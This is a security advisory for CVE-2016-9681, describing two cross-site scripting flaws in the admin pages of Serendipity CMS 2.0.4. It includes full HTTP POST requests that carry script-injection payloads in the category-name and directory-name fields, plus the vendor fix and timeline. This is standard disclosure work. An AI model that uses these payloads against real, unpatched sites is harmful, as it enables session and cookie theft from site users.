[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4
Product Information:
Software: Serendipity CMS
Tested Version: 2.0.4, released 26.09.2016
Vulnerability Type: Cross-Site Scripting (CWE-79)
Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4
Description: Serendipity is a PHP-powered weblog engine that gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)
Vulnerability description:
There are two XSS vulnerabilities in Serendipity CMS.
1) XSS in the creation of a new category page
2) XSS in the creation of the base directory page
Category Page
When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:
POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380
serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=CreateThe parameter serendipity[cat][name] is vulnerable to XSS.
The payload is executed when an authenticated user creates another category.
Base Directory Page
When an authenticated user of Serendipity CMS is creating a new base directory, the following POST request is sent to the server:
POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directoryThe parameter serendipity[name] is vulnerable to reflected XSS.
The payload is executed immediately upon creating the new directory and it occurs only once.
Impact:
An attacker is able to inject malicious scripts into otherwise benign and trusted websites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of an HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).
Solution:
Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html
Timeline:
Vulnerability found: 25.11.2016
The vendor informed: 26.11.2016
Response by vendor: 28.11.2016
Fix by vendor: 28.11.2016
Public Advisory: 03.12.2016
Reference:
https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be